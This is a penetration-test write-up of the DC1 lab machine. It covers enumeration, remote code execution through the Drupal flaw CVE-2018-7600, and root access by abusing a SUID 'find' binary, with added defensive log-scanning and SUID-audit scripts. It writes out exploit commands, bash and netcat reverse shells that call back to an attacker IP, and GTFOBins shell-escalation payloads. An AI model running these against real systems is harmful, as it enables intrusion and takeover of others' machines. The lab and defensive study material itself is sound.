DC1
DC1 - 192.168.235.193
nmap -sCV -p- -A --min-rate 10000 192.168.116.193
The Nmap output shows us that there are 3 ports open: 22 (SSH), 80 (HTTP), 111 (RPC)
We find that port 80 is running http, so we open the IP in our browser.
Enumerate using port 80
gobuster dir -u http://192.168.235.193/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -b 404,401 -x php,asp,js,txt,html
Droopescan
Since Nmap showed a Drupal website on port 80, I ran Droopescan, a tool that gathers specific information about Drupal instances, such as identifying the version or listing installed themes and plugins.
# Target Identification
droopescan scan drupal -u example.org
droopescan scan drupal -U list_of_urls.txt
# You can also omit the drupal argument, so it will trigger the CMS identification
droopescan scan -u example.org
droopescan scan -U list_of_urls.txt
Exploiting Using Python
https://ine.com/blog/cve-2018-7600-drupalgeddon-2
https://www.exploit-db.com/exploits/46459
python3 exploit.py http://192.168.100.154:8081/ "id"
python3 46459.py http://192.168.116.193/ "id"
echo "bash -c 'exec bash -i &>/dev/tcp/192.168.45.185/4242 <&1'" | base64
bash%20-c%20'exec%20bash%20-i%20&%3E/dev/tcp/192.168.45.185/4242%20%3C&1'
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
After researching this exploitation, I found a great tool on GitHub called "Drupal 7 (CVE-2018-7600 / SA-CORE-2018-002) by PIMPS". By poisoning the password recovery form (user/password) and triggering it with a file upload via AJAX (/file/ajax), this exploitation allows us to perform REMOTE CODE EXECUTION. As I executed the exploit against the system, here are the outputs:
python drupa7-CVE-2018-7600.py http://192.168.116.193/ -c 'cat /etc/passwd'
python drupa7-CVE-2018-7600.py http://192.168.116.193/ -c ls
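From the defender's side, the two stages the paragraph above describes (render-array keys injected into the user/password form, then the /file/ajax callback that triggers them) leave a recognisable trace in the web server's access log. The following is an added example, not code from the original write-up or from the exploit's author: a small Python scanner that parses Apache combined-format lines and flags requests carrying those markers. The log lines, IPs and form build id are constructed for the example; the render-array key names are the ones public IDS signatures for Drupalgeddon 2 key on.

```python
import re
from urllib.parse import unquote

# Added example (not from the original write-up): flag web-server requests that
# carry the CVE-2018-7600 pattern: render-array keys injected into the
# user/password form, then the file/ajax callback used to trigger them.

# Render-array property names that legitimate clients never send as form input.
RENDER_KEYS = ("#post_render", "#pre_render", "#lazy_builder", "#access_callback")

# Apache combined log format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not real traffic): one benign page view, the two
# stages of the attack, and a legitimate visit to the password-reset page.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /?q=node/1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:02 +0000] "POST /?q=user/password&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=id HTTP/1.1" 200 812 "-" "python-requests/2.25"
10.0.0.9 - - [10/Mar/2024:12:00:03 +0000] "POST /?q=file/ajax/name/%23value/form-abc123 HTTP/1.1" 200 77 "-" "python-requests/2.25"
10.0.0.7 - - [10/Mar/2024:12:00:04 +0000] "GET /user/password HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the captured fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_drupalgeddon2(target):
    """True when the request target carries an injected render-array key (stage 1)
    or the file/ajax trigger for one (stage 2). The target is decoded twice so a
    double-encoded '#' (%2523) does not slip past the check."""
    decoded = unquote(unquote(target)).lower()
    stage1 = any(key in decoded for key in RENDER_KEYS)
    stage2 = "file/ajax/" in decoded and "#value" in decoded
    return stage1 or stage2


def scan_log(text):
    """Return (ip, method, target) for each suspicious request in the log text."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec and is_drupalgeddon2(rec["target"]):
            alerts.append((rec["ip"], rec["method"], rec["target"]))
    return alerts


if __name__ == "__main__":
    for ip, method, target in scan_log(SAMPLE_LOG):
        print(f"ALERT {ip} {method} {target}")
```

Two caveats: the access log only shows query-string payloads, so a variant that carries the keys in the POST body is only visible in a WAF or mod_security audit log; and detection is the fallback, not the fix. The vulnerability was patched in Drupal 7.58 (SA-CORE-2018-002), so an instance reporting an older version to Droopescan is the real finding.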
This is good, now let's get a reverse shell. Check with the fellows at the Pentest Monkey cheat sheet. Guess who found one that works. THIS GUY.
'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.185 1234 >/tmp/f'
python drupa7-CVE-2018-7600.py http://192.168.116.193/ -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.185 1234 >/tmp/f'
Run the command below on the attacker machine
nc -nvlp 1234
After getting a reverse shell we spawn a TTY shell using Python. Then we search for files with the SUID permission on the server and find that the "find" command has the SUID bit set.
python -c 'import pty; pty.spawn("/bin/bash")'
find / -perm -u=s -type f 2>/dev/null
Privilege Escalation
Some of the things I checked were:
• cat /etc/passwd: users on the machine
• ls -la /etc/*: odd services or permissions (files writeable by everyone or not owned by root)
• ls -la /home: users' data; one user existed, called flag4
• ps aux | grep root: root services
• netstat -antup: local ports running services only for localhost
This is when S1ren reviewed SUID and SGID escalations. SUID is where running a command as a low-privileged user executes it with the effective permissions of the file's owner, here root. Some commands allow options that can be used to execute other commands, like spawning a new shell session. The command to search for SUIDs is find / -perm -u=s -type f 2>/dev/null
• find: the command we’re using to search
• /: search in the base directory
• -perm -u=s: permissions for SUID
• -type f: search for files only
• 2>/dev/null: redirect errors to “null” (don’t display errors)
Running find we see there are 18 programs with the permission we want to review. For new hackers, we can use GTFOBins to learn about each of the programs that might spawn a new root shell. With experience this will be a faster process.
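The find command broken down above is really a filesystem audit, and the same audit is what a defender runs to catch a binary like find or nano that should never carry the SUID bit. The following is an added example, not code from the original write-up: a Python script that mirrors the find tests (-type f, -perm -u=s, and the -perm -g=s variant shown later under "Another way"), walks the filesystem with errors suppressed as 2>/dev/null does, and then labels each hit as expected, risky (GTFOBins lists it as able to spawn a shell) or unexpected. The baseline of expected SUID binaries and the list of shell-capable names are illustrative subsets I chose for the example, not a complete reference; a real audit compares against the package manager's or a golden image's list.

```python
import os
import stat

# Added example (not from the original write-up): audit SUID/SGID binaries the
# way "find / -perm -u=s -type f 2>/dev/null" does, then flag the ones that
# can spawn a shell and print the command that strips the bit.

# Names GTFOBins documents as able to spawn a shell when SUID. Illustrative
# subset (assumption), not the full list; find and nano are the two this box relies on.
SHELL_CAPABLE = {"find", "nano", "vim", "vi", "bash", "sh", "python",
                 "python3", "perl", "env", "awk", "less", "more"}

# SUID binaries normally present on a Debian-style host. Illustrative baseline
# (assumption); a real audit would use the package manager's or a golden image's list.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp",
}


def setid_kind(mode):
    """Mirror find's tests: -type f, -perm -u=s (0o4000), -perm -g=s (0o2000).
    Returns 'suid', 'sgid', 'suid+sgid' or None. Symlinks and other
    non-regular files return None, like find ... ! -type l."""
    if not stat.S_ISREG(mode):
        return None
    kinds = []
    if mode & stat.S_ISUID:
        kinds.append("suid")
    if mode & stat.S_ISGID:
        kinds.append("sgid")
    return "+".join(kinds) or None


def walk_setid(root="/"):
    """Walk the filesystem and return {path: kind} for every set-id regular
    file, swallowing permission errors the way 2>/dev/null hides them."""
    found = {}
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                kind = setid_kind(os.lstat(path).st_mode)
            except OSError:
                continue
            if kind:
                found[path] = kind
    return found


def classify(paths, expected=EXPECTED_SUID, risky=SHELL_CAPABLE):
    """Label each set-id path: 'risky' (can spawn a shell), 'expected' (in the
    baseline) or 'unexpected' (neither; needs a human look)."""
    result = {}
    for path in paths:
        if os.path.basename(path) in risky:
            result[path] = "risky"
        elif path in expected:
            result[path] = "expected"
        else:
            result[path] = "unexpected"
    return result


def remediation_lines(labels):
    """Commands an admin would run to strip the bits from risky and unexpected
    binaries; expected ones are left alone."""
    return [f"chmod u-s,g-s {p}" for p, label in sorted(labels.items())
            if label != "expected"]


if __name__ == "__main__":
    labels = classify(walk_setid("/"))
    for path, label in sorted(labels.items()):
        print(f"{label:10} {path}")
    print("\n".join(remediation_lines(labels)))
```

On the DC1 box this would print "risky /usr/bin/find" and suggest "chmod u-s,g-s /usr/bin/find", which is the whole fix for the privilege escalation that follows; on a hardened host the risky list is empty and the unexpected list is what a reviewer reads.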
GTFOBins shows that find can also be used to spawn a new root shell. Pasting from the website into our www-data shell, I got multiple errors. Passing the -p parameter also closed the www-data shell.
/usr/bin/find
./find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
sudo /usr/bin/find . -exec /bin/sh \; -quit
python -c 'import pty; pty.spawn("/bin/bash")'
find . -exec /bin/sh \; -quit
Going back to the post-exploit recon data gathered earlier, and after a few trials of other kernel exploits which failed, we look for files with the SUID permission on the server and find that the "find" command has the SUID bit set. This allows us to run the find command with root privileges, because the SUID bit is set and the file is owned by root. A further search confirms it, as shown below.
find / -perm -u=s -type f 2>/dev/null
My research uncovered this great article, Abusing SUDO (Linux Privilege Escalation) by Touhid Shaikh, which explains the process and why it works. With a better understanding of this process, maybe the PRIVESC is not so hard. Here is the PRIVESC for this box. With one line of command-line kung fu we were able to get ROOT.
https://touhidshaikh.com/
find /bin -name nano -exec /bin/sh \;
https://infosecwriteups.com/vulnhub-writeup-dc-1-37dcf92b456a
Another way
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
ls /root gives us Permission denied, but with the help of the SUID find we can read the files under /root.
find /root/thefinalflag.txt -exec cat {} \;
find /root/thefinalflag.txt -exec /bin/sh \;